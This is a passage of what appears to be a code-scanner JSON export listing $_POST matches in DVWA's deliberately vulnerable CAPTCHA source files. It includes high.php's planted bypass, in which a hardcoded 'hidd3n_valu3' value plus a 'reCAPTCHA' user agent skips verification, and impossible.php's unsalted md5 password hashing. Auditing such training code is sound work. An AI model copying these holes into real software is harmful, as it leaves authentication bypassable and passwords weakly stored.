punctuation\">]</span><span class=\"token punctuation\">,</span>\n<span class=\"line-number\">13:</span> \t\t<span class=\"token variable\">$_SERVER</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'REMOTE_ADDR'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span>",
"line": 8,
"start": 3,
"end": 14,
"severity": "unknown",
"note": ""
},
{
"id": 93,
"file": "/home/chris/src/DVWA-master/vulnerabilities/captcha/source/high.php",
"filetype": "php",
"search": "\\s\\$_POST",
"match": "<span class=\"line-number\">4:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Hide the CAPTCHA form\n<span class=\"line-number\">5:</span> \t<span class=\"token variable\">$hide_form</span> <span class=\"token operator\">=</span> <span class=\"token boolean\">true</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">6:</span> \n<span class=\"line-number\">7:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Get input\n<span class=\"line-number\">8:</span> \t<span class=\"token variable\">$pass_new</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'password_new'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"highlight\"><span class=\"line-number\">9:</span> \t<span class=\"token variable\">$pass_conf</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'password_conf'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span></span>\n<span class=\"line-number\">10:</span> \n<span class=\"line-number\">11:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Check CAPTCHA from 3rd party\n<span class=\"line-number\">12:</span> \t<span class=\"token variable\">$resp</span> <span class=\"token operator\">=</span> <span class=\"token function\">recaptcha_check_answer</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_DVWA</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'recaptcha_private_key'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span>\n<span class=\"line-number\">13:</span> \t\t<span class=\"token variable\">$_SERVER</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'REMOTE_ADDR'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span>\n<span class=\"line-number\">14:</span> \t\t<span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'recaptcha_challenge_field'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span>",
"line": 9,
"start": 4,
"end": 15,
"severity": "unknown",
"note": ""
},
{
"id": 94,
"file": "/home/chris/src/DVWA-master/vulnerabilities/captcha/source/high.php",
"filetype": "php",
"search": "\\s\\$_POST",
"match": "<span class=\"line-number\">9:</span> \t<span class=\"token variable\">$pass_conf</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'password_conf'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">10:</span> \n<span class=\"line-number\">11:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Check CAPTCHA from 3rd party\n<span class=\"line-number\">12:</span> \t<span class=\"token variable\">$resp</span> <span class=\"token operator\">=</span> <span class=\"token function\">recaptcha_check_answer</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_DVWA</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'recaptcha_private_key'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span>\n<span class=\"line-number\">13:</span> \t\t<span class=\"token variable\">$_SERVER</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'REMOTE_ADDR'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span>\n<span class=\"highlight\"><span class=\"line-number\">14:</span> \t\t<span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'recaptcha_challenge_field'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span></span>\n<span class=\"line-number\">15:</span> \t\t<span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'recaptcha_response_field'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">16:</span> \n<span class=\"line-number\">17:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Did the CAPTCHA fail<span class=\"token operator\">?</span>\n<span class=\"line-number\">18:</span> \t<span class=\"token function\">if</span><span class=\"token punctuation\">(</span> !<span class=\"token variable\">$resp</span><span class=\"token operator\">-</span><span class=\"token operator\">></span>is_valid <span class=\"token operator\">&</span><span class=\"token operator\">&</span> <span class=\"token punctuation\">(</span> <span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'recaptcha_response_field'</span> <span class=\"token punctuation\">]</span> !<span class=\"token operator\">=</span> <span class=\"token string\">'hidd3n_valu3'</span> || <span class=\"token variable\">$_SERVER</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'HTTP_USER_AGENT'</span> <span class=\"token punctuation\">]</span> !<span class=\"token operator\">=</span> <span class=\"token string\">'reCAPTCHA'</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">)</span> {\n<span class=\"line-number\">19:</span> \t\t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> What happens when the CAPTCHA was entered incorrectly",
"line": 14,
"start": 9,
"end": 20,
"severity": "unknown",
"note": ""
},
{
"id": 95,
"file": "/home/chris/src/DVWA-master/vulnerabilities/captcha/source/high.php",
"filetype": "php",
"search": "\\s\\$_POST",
"match": "<span class=\"line-number\">10:</span> \n<span class=\"line-number\">11:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Check CAPTCHA from 3rd party\n<span class=\"line-number\">12:</span> \t<span class=\"token variable\">$resp</span> <span class=\"token operator\">=</span> <span class=\"token function\">recaptcha_check_answer</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_DVWA</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'recaptcha_private_key'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span>\n<span class=\"line-number\">13:</span> \t\t<span class=\"token variable\">$_SERVER</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'REMOTE_ADDR'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span>\n<span class=\"line-number\">14:</span> \t\t<span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'recaptcha_challenge_field'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span>\n<span class=\"highlight\"><span class=\"line-number\">15:</span> \t\t<span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'recaptcha_response_field'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span></span>\n<span class=\"line-number\">16:</span> \n<span class=\"line-number\">17:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Did the CAPTCHA fail<span class=\"token operator\">?</span>\n<span class=\"line-number\">18:</span> \t<span class=\"token function\">if</span><span class=\"token punctuation\">(</span> !<span class=\"token variable\">$resp</span><span class=\"token operator\">-</span><span class=\"token operator\">></span>is_valid <span class=\"token operator\">&</span><span class=\"token operator\">&</span> <span class=\"token punctuation\">(</span> <span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'recaptcha_response_field'</span> <span class=\"token punctuation\">]</span> !<span class=\"token operator\">=</span> <span class=\"token string\">'hidd3n_valu3'</span> || <span class=\"token variable\">$_SERVER</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'HTTP_USER_AGENT'</span> <span class=\"token punctuation\">]</span> !<span class=\"token operator\">=</span> <span class=\"token string\">'reCAPTCHA'</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">)</span> {\n<span class=\"line-number\">19:</span> \t\t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> What happens when the CAPTCHA was entered incorrectly\n<span class=\"line-number\">20:</span> \t\t<span class=\"token variable\">$html</span> <span class=\"token punctuation\">.</span><span class=\"token operator\">=</span> <span class=\"token string\">\"<pre><br />The CAPTCHA was incorrect. Please try again.</pre>\"</span><span class=\"token comment\" spellcheck=\"true\">;</span>",
"line": 15,
"start": 10,
"end": 21,
"severity": "unknown",
"note": ""
},
{
"id": 96,
"file": "/home/chris/src/DVWA-master/vulnerabilities/captcha/source/high.php",
"filetype": "php",
"search": "\\s\\$_POST",
"match": "<span class=\"line-number\">13:</span> \t\t<span class=\"token variable\">$_SERVER</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'REMOTE_ADDR'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span>\n<span class=\"line-number\">14:</span> \t\t<span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'recaptcha_challenge_field'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span>\n<span class=\"line-number\">15:</span> \t\t<span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'recaptcha_response_field'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">16:</span> \n<span class=\"line-number\">17:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Did the CAPTCHA fail<span class=\"token operator\">?</span>\n<span class=\"highlight\"><span class=\"line-number\">18:</span> \t<span class=\"token function\">if</span><span class=\"token punctuation\">(</span> !<span class=\"token variable\">$resp</span><span class=\"token operator\">-</span><span class=\"token operator\">></span>is_valid <span class=\"token operator\">&</span><span class=\"token operator\">&</span> <span class=\"token punctuation\">(</span> <span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'recaptcha_response_field'</span> <span class=\"token punctuation\">]</span> !<span class=\"token operator\">=</span> <span class=\"token string\">'hidd3n_valu3'</span> || <span class=\"token variable\">$_SERVER</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'HTTP_USER_AGENT'</span> <span class=\"token punctuation\">]</span> !<span class=\"token operator\">=</span> <span class=\"token string\">'reCAPTCHA'</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">)</span> {</span>\n<span class=\"line-number\">19:</span> \t\t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> What happens when the CAPTCHA was entered incorrectly\n<span class=\"line-number\">20:</span> \t\t<span class=\"token variable\">$html</span> <span class=\"token punctuation\">.</span><span class=\"token operator\">=</span> <span class=\"token string\">\"<pre><br />The CAPTCHA was incorrect. Please try again.</pre>\"</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">21:</span> \t\t<span class=\"token variable\">$hide_form</span> <span class=\"token operator\">=</span> <span class=\"token boolean\">false</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">22:</span> \t\treturn<span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">23:</span> \t}",
"line": 18,
"start": 13,
"end": 24,
"severity": "unknown",
"note": ""
},
{
"id": 102,
"file": "/home/chris/src/DVWA-master/vulnerabilities/captcha/source/impossible.php",
"filetype": "php",
"search": "\\s\\$_POST",
"match": "<span class=\"line-number\">1:</span> <span class=\"token operator\"><</span><span class=\"token operator\">?</span>php\n<span class=\"line-number\">2:</span> \n<span class=\"highlight\"><span class=\"line-number\">3:</span> <span class=\"token function\">if</span><span class=\"token punctuation\">(</span> <span class=\"token function\">isset</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'Change'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">)</span> {</span>\n<span class=\"line-number\">4:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Check Anti<span class=\"token operator\">-</span>CSRF token\n<span class=\"line-number\">5:</span> \t<span class=\"token function\">checkToken</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_REQUEST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'user_token'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token variable\">$_SESSION</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'session_token'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token string\">'index.php'</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">6:</span> \n<span class=\"line-number\">7:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Hide the CAPTCHA form\n<span class=\"line-number\">8:</span> \t<span class=\"token variable\">$hide_form</span> <span class=\"token operator\">=</span> <span class=\"token boolean\">true</span><span class=\"token comment\" spellcheck=\"true\">;</span>",
"line": 3,
"start": 1,
"end": 9,
"severity": "unknown",
"note": ""
},
{
"id": 103,
"file": "/home/chris/src/DVWA-master/vulnerabilities/captcha/source/impossible.php",
"filetype": "php",
"search": "\\s\\$_POST",
"match": "<span class=\"line-number\">6:</span> \n<span class=\"line-number\">7:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Hide the CAPTCHA form\n<span class=\"line-number\">8:</span> \t<span class=\"token variable\">$hide_form</span> <span class=\"token operator\">=</span> <span class=\"token boolean\">true</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">9:</span> \n<span class=\"line-number\">10:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Get input\n<span class=\"highlight\"><span class=\"line-number\">11:</span> \t<span class=\"token variable\">$pass_new</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'password_new'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span></span>\n<span class=\"line-number\">12:</span> \t<span class=\"token variable\">$pass_new</span> <span class=\"token operator\">=</span> <span class=\"token function\">stripslashes</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$pass_new</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">13:</span> \t<span class=\"token variable\">$pass_new</span> <span class=\"token operator\">=</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token function\">isset</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">&</span><span class=\"token operator\">&</span> <span class=\"token function\">is_object</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token function\">mysqli_real_escape_string</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token variable\">$pass_new</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">:</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token function\">trigger_error</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.\"</span><span class=\"token punctuation\">,</span> E_USER_ERROR<span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token string\">\"\"</span> <span class=\"token punctuation\">:</span> <span class=\"token string\">\"\"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">14:</span> \t<span class=\"token variable\">$pass_new</span> <span class=\"token operator\">=</span> <span class=\"token function\">md5</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$pass_new</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">15:</span> \n<span class=\"line-number\">16:</span> \t<span class=\"token variable\">$pass_conf</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'password_conf'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span>",
"line": 11,
"start": 6,
"end": 17,
"severity": "unknown",
"note": ""
},
{
"id": 104,
"file": "/home/chris/src/DVWA-master/vulnerabilities/captcha/source/impossible.php",
"filetype": "php",
"search": "\\s\\$_POST",
"match": "<span class=\"line-number\">11:</span> \t<span class=\"token variable\">$pass_new</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'password_new'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">12:</span> \t<span class=\"token variable\">$pass_new</span> <span class=\"token operator\">=</span> <span class=\"token function\">stripslashes</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$pass_new</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">13:</span> \t<span class=\"token variable\">$pass_new</span> <span class=\"token operator\">=</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token function\">isset</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">&</span><span class=\"token operator\">&</span> <span class=\"token function\">is_object</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token function\">mysqli_real_escape_string</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token variable\">$pass_new</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">:</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token function\">trigger_error</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.\"</span><span class=\"token punctuation\">,</span> E_USER_ERROR<span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token string\">\"\"</span> <span class=\"token punctuation\">:</span> <span class=\"token string\">\"\"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">14:</span> \t<span class=\"token variable\">$pass_new</span> <span class=\"token operator\">=</span> <span class=\"token function\">md5</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$pass_new</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">15:</span> \n<span class=\"highlight\"><span class=\"line-number\">16:</span> \t<span class=\"token variable\">$pass_conf</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'password_conf'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span></span>\n<span class=\"line-number\">17:</span> \t<span class=\"token variable\">$pass_conf</span> <span class=\"token operator\">=</span> <span class=\"token function\">stripslashes</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$pass_conf</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">18:</span> \t<span class=\"token variable\">$pass_conf</span> <span class=\"token operator\">=</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token function\">isset</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">&</span><span class=\"token operator\">&</span> <span class=\"token function\">is_object</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token function\">mysqli_real_escape_string</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token variable\">$pass_conf</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">:</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token function\">trigger_error</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.\"</span><span class=\"token punctuation\">,</span> E_USER_ERROR<span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token string\">\"\"</span> <span class=\"token punctuation\">:</span> <span class=\"token string\">\"\"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">19:</span> \t<span class=\"token variable\">$pass_conf</span> <span class=\"token operator\">=</span> <span class=\"token function\">md5</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$pass_conf</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">20:</span> \n<span class=\"line-number\">21:</span> \t<span class=\"token variable\">$pass_curr</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'password_current'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span>",
"line": 16,
"start": 11,
"end": 22,
"severity": "unknown",
"note": ""
},
{
"id": 105,
"file": "/home/chris/src/DVWA-master/vulnerabilities/captcha/source/impossible.php",
"filetype": "php",
"search": "\\s\\$_POST",
"match": "<span class=\"line-number\">16:</span> \t<span class=\"token variable\">$pass_conf</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'password_conf'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">17:</span> \t<span class=\"token variable\">$pass_conf</span> <span class=\"token operator\">=</span> <span class=\"token function\">stripslashes</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$pass_conf</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">18:</span> \t<span class=\"token variable\">$pass_conf</span> <span class=\"token operator\">=</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token function\">isset</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">&</span><span class=\"token operator\">&</span> <span class=\"token function\">is_object</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token function\">mysqli_real_escape_string</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token variable\">$pass_conf</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">:</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token function\">trigger_error</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.\"</span><span class=\"token punctuation\">,</span> E_USER_ERROR<span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token string\">\"\"</span> <span class=\"token punctuation\">:</span> <span class=\"token string\">\"\"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">19:</span> \t<span class=\"token variable\">$pass_conf</span> <span class=\"token operator\">=</span> <span class=\"token function\">md5</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$pass_conf</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">20:</span> \n<span class=\"highlight\"><span class=\"line-number\">21:</span> \t<span class=\"token variable\">$pass_curr</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'password_current'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span></span>\n<span class=\"line-number\">22:</span> \t<span class=\"token variable\">$pass_curr</span> <span class=\"token operator\">=</span> <span class=\"token function\">stripslashes</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$pass_curr</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">23:</span> \t<span class=\"token variable\">$pass_curr</span> <span class=\"token operator\">=</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token function\">isset</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">&</span><span class=\"token operator\">&</span> <span class=\"token function\">is_object</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token function\">mysqli_real_escape_string</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token variable\">$pass_curr</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">:</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token function\">trigger_error</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.\"</span><span class=\"token punctuation\">,</span> E_USER_ERROR<span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token string\">\"\"</span> <span class=\"token punctuation\">:</span> <span class=\"token string\">\"\"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">24:</span> \t<span class=\"token variable\">$pass_curr</span> <span class=\"token operator\">=</span> <span class=\"token function\">md5</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$pass_curr</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">25:</span> \n<span class=\"line-number\">26:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Check CAPTCHA from 3rd party",
"line": 21,
"start": 16,
"end": 27,
"severity": "unknown",
"note": ""
},
{
"id": 106,
"file": "/home/chris/src/DVWA-master/vulnerabilities/captcha/source/impossible.php",
"filetype": "php",
"search": "\\s\\$_POST",
"match": "<span class=\"line-number\">24:</span> \t<span class=\"token variable\">$pass_curr</span> <span class=\"token operator\">=</span> <span class=\"token function\">md5</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$pass_curr</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">25:</span> \n<span class=\"line-number\">26:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Check CAPTCHA from 3rd party\n<span class=\"line-number\">27:</span> \t<span class=\"token variable\">$resp</span> <span class=\"token operator\">=</span> <span class=\"token function\">recaptcha_check_answer</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_DVWA</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'recaptcha_private_key'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span>\n<span class=\"line-number\">28:</span> \t\t<span class=\"token variable\">$_SERVER</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'REMOTE_ADDR'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span>\n<span class=\"highlight\"><span class=\"line-number\">29:</span> \t\t<span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'recaptcha_challenge_field'</span> <span 